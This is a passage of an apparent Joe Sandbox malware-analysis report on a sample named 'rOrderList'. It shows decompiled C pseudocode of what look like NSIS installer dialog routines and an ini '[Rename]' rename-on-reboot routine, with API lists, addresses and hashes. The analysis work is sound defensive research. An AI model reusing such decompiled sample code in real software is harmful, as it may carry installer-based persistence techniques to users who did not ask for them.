                                                                                      								_v88 = _v16;
                                                                                      								_t316 = 0x20;
                                                                                      								_v84 = 0xffff0002;
                                                                                      								_v80 = 0xd;
                                                                                      								_v68 = _t316;
                                                                                      								_v44 = _t306;
                                                                                      								_v72 = _t286 & _t316;
                                                                                      								if((_t286 & 0x00000002) == 0) {
                                                                                      									if((_t286 & 0x00000004) == 0) {
                                                                                      										 *( *0x423740 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									} else {
                                                                                      										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                      									}
                                                                                      								} else {
                                                                                      									_v80 = 0x4d;
                                                                                      									_v48 = 1;
                                                                                      									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									_v32 = 1;
                                                                                      									 *( *0x423740 + _t306 * 4) = _t291;
                                                                                      									_v16 =  *( *0x423740 + _t306 * 4);
                                                                                      								}
                                                                                      							}
                                                                                      							_t306 = _t306 + 1;
                                                                                      							_t324 =  &(_v28[0x818]);
                                                                                      							_v28 = _t324;
                                                                                      						} while (_t306 <  *0x42a2ac);
                                                                                      						if(_v32 != 0) {
                                                                                      							L20:
                                                                                      							if(_v20 != 0) {
                                                                                      								E004044C7(_v8);
                                                                                      								_t298 = _v36;
                                                                                      								goto L23;
                                                                                      							} else {
                                                                                      								ShowWindow(_v12, 5);
                                                                                      								E004044C7(_v12);
                                                                                      								L93:
                                                                                      								return E004044F9(_a8, _a12, _a16);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L19;
                                                                                      					}
                                                                                      				}
                                                                                      			}


























































                                                                                      0x00404f1d
                                                                                      0x00404f23
                                                                                      0x00404f25
                                                                                      0x00404f2b
                                                                                      0x00404f31
                                                                                      0x00404f47
                                                                                      0x00404f4a
                                                                                      0x00404f4d
                                                                                      0x00405180
                                                                                      0x00405187
                                                                                      0x0040519b
                                                                                      0x00405189
                                                                                      0x0040518b
                                                                                      0x0040518e
                                                                                      0x0040518f
                                                                                      0x00405196
                                                                                      0x00405196
                                                                                      0x004051a7
                                                                                      0x004051b5
                                                                                      0x004051b8
                                                                                      0x004051ce
                                                                                      0x00405246
                                                                                      0x00405249
                                                                                      0x0040524b
                                                                                      0x00405255
                                                                                      0x00405263
                                                                                      0x00405263
                                                                                      0x00405265
                                                                                      0x0040526f
                                                                                      0x00405275
                                                                                      0x00405278
                                                                                      0x00405293
                                                                                      0x0040527a
                                                                                      0x00405284
                                                                                      0x00405284
                                                                                      0x00405278
                                                                                      0x0040526f
                                                                                      0x00000000
                                                                                      0x00405249
                                                                                      0x004051d3
                                                                                      0x004051de
                                                                                      0x004051e3
                                                                                      0x004051ea
                                                                                      0x004051f1
                                                                                      0x004051f4
                                                                                      0x004051fc
                                                                                      0x004051fc
                                                                                      0x00405200
                                                                                      0x00405204
                                                                                      0x00405208
                                                                                      0x0040521b
                                                                                      0x0040520a
                                                                                      0x0040520a
                                                                                      0x00405211
                                                                                      0x00405217
                                                                                      0x00405213
                                                                                      0x00405213
                                                                                      0x00405213
                                                                                      0x00405211
                                                                                      0x00405221
                                                                                      0x00405223
                                                                                      0x0040522b
                                                                                      0x00405233
                                                                                      0x00405243
                                                                                      0x00405243
                                                                                      0x00405204
                                                                                      0x00000000
                                                                                      0x004051f4
                                                                                      0x004051d5
                                                                                      0x004051dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405296
                                                                                      0x00405296
                                                                                      0x0040529d
                                                                                      0x0040530e
                                                                                      0x00405315
                                                                                      0x00405321
                                                                                      0x00405321
                                                                                      0x0040532a
                                                                                      0x0040532c
                                                                                      0x00405333
                                                                                      0x00405336
                                                                                      0x00405336
                                                                                      0x0040533c
                                                                                      0x00405343
                                                                                      0x00405346
                                                                                      0x00405346
                                                                                      0x0040534c
                                                                                      0x00405352
                                                                                      0x00405358
                                                                                      0x00405358
                                                                                      0x00405365
                                                                                      0x004054c5
                                                                                      0x004054cc
                                                                                      0x004054e9
                                                                                      0x004054ef
                                                                                      0x00405501
                                                                                      0x00405501
                                                                                      0x00000000
                                                                                      0x0040536b
                                                                                      0x0040536d
                                                                                      0x00405372
                                                                                      0x00405377
                                                                                      0x0040537c
                                                                                      0x0040537e
                                                                                      0x0040537e
                                                                                      0x0040537f
                                                                                      0x00405380
                                                                                      0x00405382
                                                                                      0x00405382
                                                                                      0x0040538a
                                                                                      0x004053cb
                                                                                      0x004053cd
                                                                                      0x004053dd
                                                                                      0x004053e0
                                                                                      0x004053e5
                                                                                      0x004053ec
                                                                                      0x004053ef
                                                                                      0x00405491
                                                                                      0x00405499
                                                                                      0x004054a1
                                                                                      0x004054a1
                                                                                      0x004054af
                                                                                      0x004054c0
                                                                                      0x004054c0
                                                                                      0x00000000
                                                                                      0x004054af
                                                                                      0x004053f5
                                                                                      0x004053f8
                                                                                      0x004053fe
                                                                                      0x00405403
                                                                                      0x00405405
                                                                                      0x00405407
                                                                                      0x0040540d
                                                                                      0x00405414
                                                                                      0x00405419
                                                                                      0x00405420
                                                                                      0x00405423
                                                                                      0x00405423
                                                                                      0x0040542a
                                                                                      0x00405436
                                                                                      0x0040543a
                                                                                      0x0040543c
                                                                                      0x0040543c
                                                                                      0x0040542c
                                                                                      0x0040542e
                                                                                      0x0040542e
                                                                                      0x0040545c
                                                                                      0x00405468
                                                                                      0x00405477
                                                                                      0x00405477
                                                                                      0x00405479
                                                                                      0x0040547c
                                                                                      0x00405485
                                                                                      0x00000000
                                                                                      0x0040538c
                                                                                      0x00405397
                                                                                      0x0040539a
                                                                                      0x0040539f
                                                                                      0x004053a1
                                                                                      0x004053a5
                                                                                      0x004053b5
                                                                                      0x004053bf
                                                                                      0x004053c1
                                                                                      0x004053c4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004053a7
                                                                                      0x004053a7
                                                                                      0x004053ad
                                                                                      0x004053af
                                                                                      0x004053af
                                                                                      0x004053b0
                                                                                      0x004053b1
                                                                                      0x00000000
                                                                                      0x004053a7
                                                                                      0x0040538a
                                                                                      0x00405365
                                                                                      0x004052a5
                                                                                      0x00000000
                                                                                      0x004052bb
                                                                                      0x004052c5
                                                                                      0x004052ca
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004052dc
                                                                                      0x004052e1
                                                                                      0x004052ed
                                                                                      0x004052ed
                                                                                      0x004052ef
                                                                                      0x004052fe
                                                                                      0x00405300
                                                                                      0x00405304
                                                                                      0x00405307
                                                                                      0x00000000
                                                                                      0x00405307
                                                                                      0x004052a5
                                                                                      0x00404f53
                                                                                      0x00404f58
                                                                                      0x00404f62
                                                                                      0x00404f63
                                                                                      0x00404f6c
                                                                                      0x00404f7b
                                                                                      0x00404f86
                                                                                      0x00404f8c
                                                                                      0x00404f9a
                                                                                      0x00404faf
                                                                                      0x00404fb4
                                                                                      0x00404fbf
                                                                                      0x00404fc8
                                                                                      0x00404fdd
                                                                                      0x00404fee
                                                                                      0x00404ffb
                                                                                      0x00404ffb
                                                                                      0x00405000
                                                                                      0x00405006
                                                                                      0x00405008
                                                                                      0x0040500b
                                                                                      0x00405010
                                                                                      0x00405015
                                                                                      0x00405017
                                                                                      0x00405017
                                                                                      0x00405037
                                                                                      0x00405037
                                                                                      0x00405039
                                                                                      0x0040503a
                                                                                      0x0040503f
                                                                                      0x00405045
                                                                                      0x00405049
                                                                                      0x0040504e
                                                                                      0x00405056
                                                                                      0x0040505a
                                                                                      0x0040505f
                                                                                      0x00405064
                                                                                      0x0040506c
                                                                                      0x0040506f
                                                                                      0x0040513f
                                                                                      0x00405152
                                                                                      0x00000000
                                                                                      0x00405075
                                                                                      0x00405078
                                                                                      0x0040507b
                                                                                      0x0040507e
                                                                                      0x0040507e
                                                                                      0x00405084
                                                                                      0x0040508d
                                                                                      0x00405090
                                                                                      0x00405094
                                                                                      0x00405097
                                                                                      0x0040509a
                                                                                      0x004050a3
                                                                                      0x004050ac
                                                                                      0x004050af
                                                                                      0x004050b2
                                                                                      0x004050b5
                                                                                      0x004050f3
                                                                                      0x0040511e
                                                                                      0x004050f5
                                                                                      0x00405104
                                                                                      0x00405104
                                                                                      0x004050b7
                                                                                      0x004050ba
                                                                                      0x004050c8
                                                                                      0x004050d2
                                                                                      0x004050da
                                                                                      0x004050e1
                                                                                      0x004050ec
                                                                                      0x004050ec
                                                                                      0x004050b5
                                                                                      0x00405124
                                                                                      0x00405125
                                                                                      0x00405131
                                                                                      0x00405131
                                                                                      0x0040513d
                                                                                      0x00405158
                                                                                      0x0040515b
                                                                                      0x00405178
                                                                                      0x0040517d
                                                                                      0x00000000
                                                                                      0x0040515d
                                                                                      0x00405162
                                                                                      0x0040516b
                                                                                      0x00405503
                                                                                      0x00405515
                                                                                      0x00405515
                                                                                      0x0040515b
                                                                                      0x00000000
                                                                                      0x0040513d
                                                                                      0x0040506f

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404F16
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404F23
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F86
                                                                                      • SetWindowLongW.USER32(?,000000FC,00405518), ref: 00404FA0
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
                                                                                      • DeleteObject.GDI32(00000110), ref: 00405000
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                        • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00405336
                                                                                      • GlobalFree.KERNEL32(?), ref: 00405346
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004054EF
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004054FA
                                                                                      • ShowWindow.USER32(00000000), ref: 00405501
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 2564846305-813528018
                                                                                      • Opcode ID: a8bdb882960737aa5fa9f8fb9e921f3b8e835265e7d74f83b30dbe73f066f3dd
                                                                                      • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
                                                                                      • Opcode Fuzzy Hash: a8bdb882960737aa5fa9f8fb9e921f3b8e835265e7d74f83b30dbe73f066f3dd
                                                                                      • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E00404651(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void* _v16;
                                                                                      				struct HWND__* _t56;
                                                                                      				intOrPtr _t69;
                                                                                      				signed int _t75;
                                                                                      				signed short* _t76;
                                                                                      				signed short* _t78;
                                                                                      				long _t92;
                                                                                      				int _t103;
                                                                                      				signed int _t110;
                                                                                      				intOrPtr _t113;
                                                                                      				WCHAR* _t114;
                                                                                      				signed int* _t116;
                                                                                      				WCHAR* _t117;
                                                                                      				struct HWND__* _t118;
                                                                                      
                                                                                      				if(_a8 != 0x110) {
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L13:
                                                                                      						if(_a8 != 0x4e) {
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								 *0x421714 =  *0x421714 + 1;
                                                                                      							}
                                                                                      							L27:
                                                                                      							_t114 = _a16;
                                                                                      							L28:
                                                                                      							return E004044F9(_a8, _a12, _t114);
                                                                                      						}
                                                                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                      						_t114 = _a16;
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                      							_v12 = _t103;
                                                                                      							_v16 = _t113;
                                                                                      							_v8 = 0x428200;
                                                                                      							if(_t103 - _t113 < 0x800) {
                                                                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                      								_push(1);
                                                                                      								E00404900(_a4, _v8);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                      								_t114 = _a16;
                                                                                      							}
                                                                                      						}
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                      								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                                      							}
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                      								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                                      							}
                                                                                      							return 1;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                                      						goto L27;
                                                                                      					} else {
                                                                                      						_t69 =  *0x422720; // 0x51f64c
                                                                                      						_t29 = _t69 + 0x14; // 0x51f660
                                                                                      						_t116 = _t29;
                                                                                      						if(( *_t116 & 0x00000020) == 0) {
                                                                                      							goto L27;
                                                                                      						}
                                                                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                      						E004044B4(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                      						E004048DC();
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				_t117 = _a16;
                                                                                      				_t75 =  *(_t117 + 0x30);
                                                                                      				if(_t75 < 0) {
                                                                                      					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                                      				}
                                                                                      				_t76 =  *0x42a2b8 + _t75 * 2;
                                                                                      				_t110 =  *_t76 & 0x0000ffff;
                                                                                      				_a8 = _t110;
                                                                                      				_t78 =  &(_t76[1]);
                                                                                      				_a16 = _t78;
                                                                                      				_v16 = _t78;
                                                                                      				_v12 = 0;
                                                                                      				_v8 = E00404602;
                                                                                      				if(_t110 != 2) {
                                                                                      					_v8 = E004045C8;
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                      				_push(0x22);
                                                                                      				E00404492(_a4);
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                      				_push(0x23);
                                                                                      				E00404492(_a4);
                                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                      				E004044B4( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                      				E004044C7(_t118);
                                                                                      				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                      				_t92 =  *( *0x42a274 + 0x68);
                                                                                      				if(_t92 < 0) {
                                                                                      					_t92 = GetSysColor( ~_t92);
                                                                                      				}
                                                                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                      				 *0x421714 = 0;
                                                                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                      				 *0x421714 = 0;
                                                                                      				return 0;
                                                                                      			}



















                                                                                      0x00404663
                                                                                      0x00404790
                                                                                      0x004047ed
                                                                                      0x004047f1
                                                                                      0x004048be
                                                                                      0x004048c0
                                                                                      0x004048c0
                                                                                      0x004048c6
                                                                                      0x004048c6
                                                                                      0x004048c9
                                                                                      0x00000000
                                                                                      0x004048d0
                                                                                      0x004047ff
                                                                                      0x00404805
                                                                                      0x0040480f
                                                                                      0x0040481a
                                                                                      0x0040481d
                                                                                      0x00404820
                                                                                      0x0040482b
                                                                                      0x0040482e
                                                                                      0x00404835
                                                                                      0x00404842
                                                                                      0x00404853
                                                                                      0x00404859
                                                                                      0x00404861
                                                                                      0x0040486f
                                                                                      0x00404875
                                                                                      0x00404875
                                                                                      0x00404835
                                                                                      0x0040487f
                                                                                      0x00000000
                                                                                      0x0040488a
                                                                                      0x0040488e
                                                                                      0x0040489e
                                                                                      0x0040489e
                                                                                      0x004048a4
                                                                                      0x004048b0
                                                                                      0x004048b0
                                                                                      0x00000000
                                                                                      0x004048b4
                                                                                      0x0040487f
                                                                                      0x0040479b
                                                                                      0x00000000
                                                                                      0x004047ad
                                                                                      0x004047ad
                                                                                      0x004047b2
                                                                                      0x004047b2
                                                                                      0x004047b8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004047e1
                                                                                      0x004047e3
                                                                                      0x004047e8
                                                                                      0x00000000
                                                                                      0x004047e8
                                                                                      0x0040479b
                                                                                      0x00404669
                                                                                      0x0040466c
                                                                                      0x00404671
                                                                                      0x00404682
                                                                                      0x00404682
                                                                                      0x0040468a
                                                                                      0x0040468d
                                                                                      0x00404691
                                                                                      0x00404694
                                                                                      0x00404698
                                                                                      0x0040469b
                                                                                      0x0040469e
                                                                                      0x004046a1
                                                                                      0x004046a8
                                                                                      0x004046aa
                                                                                      0x004046aa
                                                                                      0x004046b4
                                                                                      0x004046c1
                                                                                      0x004046cb
                                                                                      0x004046d0
                                                                                      0x004046d3
                                                                                      0x004046d8
                                                                                      0x004046ef
                                                                                      0x004046f6
                                                                                      0x00404709
                                                                                      0x0040470c
                                                                                      0x00404720
                                                                                      0x00404727
                                                                                      0x0040472c
                                                                                      0x00404731
                                                                                      0x00404731
                                                                                      0x0040473f
                                                                                      0x0040474d
                                                                                      0x0040475f
                                                                                      0x00404764
                                                                                      0x00404774
                                                                                      0x00404776
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404703
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
                                                                                      • GetSysColor.USER32(?), ref: 00404731
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
                                                                                      • lstrlenW.KERNEL32(?), ref: 00404752
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004047CD
                                                                                      • SendMessageW.USER32(00000000), ref: 004047D4
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004047FF
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
                                                                                      • SetCursor.USER32(00000000), ref: 00404853
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
                                                                                      • SetCursor.USER32(00000000), ref: 0040486F
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: : Completed$N
                                                                                      • API String ID: 3103080414-2140067464
                                                                                      • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                                                                      • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
                                                                                      • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                                                                      • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406188(void* __ecx) {
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				long _t12;
                                                                                      				long _t24;
                                                                                      				char* _t31;
                                                                                      				int _t37;
                                                                                      				void* _t38;
                                                                                      				intOrPtr* _t39;
                                                                                      				long _t42;
                                                                                      				WCHAR* _t44;
                                                                                      				void* _t46;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				void* _t52;
                                                                                      				void* _t53;
                                                                                      
                                                                                      				_t38 = __ecx;
                                                                                      				_t44 =  *(_t52 + 0x14);
                                                                                      				 *0x426de8 = 0x55004e;
                                                                                      				 *0x426dec = 0x4c;
                                                                                      				if(_t44 == 0) {
                                                                                      					L3:
                                                                                      					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                                      					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                                      						_t53 = _t52 + 0x10;
                                                                                      						E00406579(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a274 + 0x128)));
                                                                                      						_t12 = E00406032(0x4275e8, 0xc0000000, 4);
                                                                                      						_t48 = _t12;
                                                                                      						 *(_t53 + 0x18) = _t48;
                                                                                      						if(_t48 != 0xffffffff) {
                                                                                      							_t42 = GetFileSize(_t48, 0);
                                                                                      							_t6 = _t37 + 0xa; // 0xa
                                                                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                      							if(_t46 == 0 || E004060B5(_t48, _t46, _t42) == 0) {
                                                                                      								L18:
                                                                                      								return CloseHandle(_t48);
                                                                                      							} else {
                                                                                      								if(E00405F97(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                      									_t49 = E00405F97(_t38, _t21 + 0xa, "\n[");
                                                                                      									if(_t49 == 0) {
                                                                                      										_t48 =  *(_t53 + 0x18);
                                                                                      										L16:
                                                                                      										_t24 = _t42;
                                                                                      										L17:
                                                                                      										E00405FED(_t24 + _t46, 0x4269e8, _t37);
                                                                                      										SetFilePointer(_t48, 0, 0, 0);
                                                                                      										E004060E4(_t48, _t46, _t42 + _t37);
                                                                                      										GlobalFree(_t46);
                                                                                      										goto L18;
                                                                                      									}
                                                                                      									_t39 = _t46 + _t42;
                                                                                      									_t31 = _t39 + _t37;
                                                                                      									while(_t39 > _t49) {
                                                                                      										 *_t31 =  *_t39;
                                                                                      										_t31 = _t31 - 1;
                                                                                      										_t39 = _t39 - 1;
                                                                                      									}
                                                                                      									_t24 = _t49 - _t46 + 1;
                                                                                      									_t48 =  *(_t53 + 0x18);
                                                                                      									goto L17;
                                                                                      								}
                                                                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                      								_t42 = _t42 + 0xa;
                                                                                      								goto L16;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					CloseHandle(E00406032(_t44, 0, 1));
                                                                                      					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t12;
                                                                                      			}



















                                                                                      0x00406188
                                                                                      0x00406191
                                                                                      0x00406198
                                                                                      0x004061a2
                                                                                      0x004061b6
                                                                                      0x004061de
                                                                                      0x004061e5
                                                                                      0x004061e9
                                                                                      0x004061ed
                                                                                      0x0040620d
                                                                                      0x00406214
                                                                                      0x0040621e
                                                                                      0x0040622b
                                                                                      0x00406230
                                                                                      0x00406235
                                                                                      0x00406239
                                                                                      0x00406248
                                                                                      0x0040624a
                                                                                      0x00406257
                                                                                      0x0040625b
                                                                                      0x004062f6
                                                                                      0x00000000
                                                                                      0x00406271
                                                                                      0x0040627e
                                                                                      0x004062a2
                                                                                      0x004062a6
                                                                                      0x004062c5
                                                                                      0x004062c9
                                                                                      0x004062c9
                                                                                      0x004062cb
                                                                                      0x004062d4
                                                                                      0x004062df
                                                                                      0x004062ea
                                                                                      0x004062f0
                                                                                      0x00000000
                                                                                      0x004062f0
                                                                                      0x004062a8
                                                                                      0x004062ab
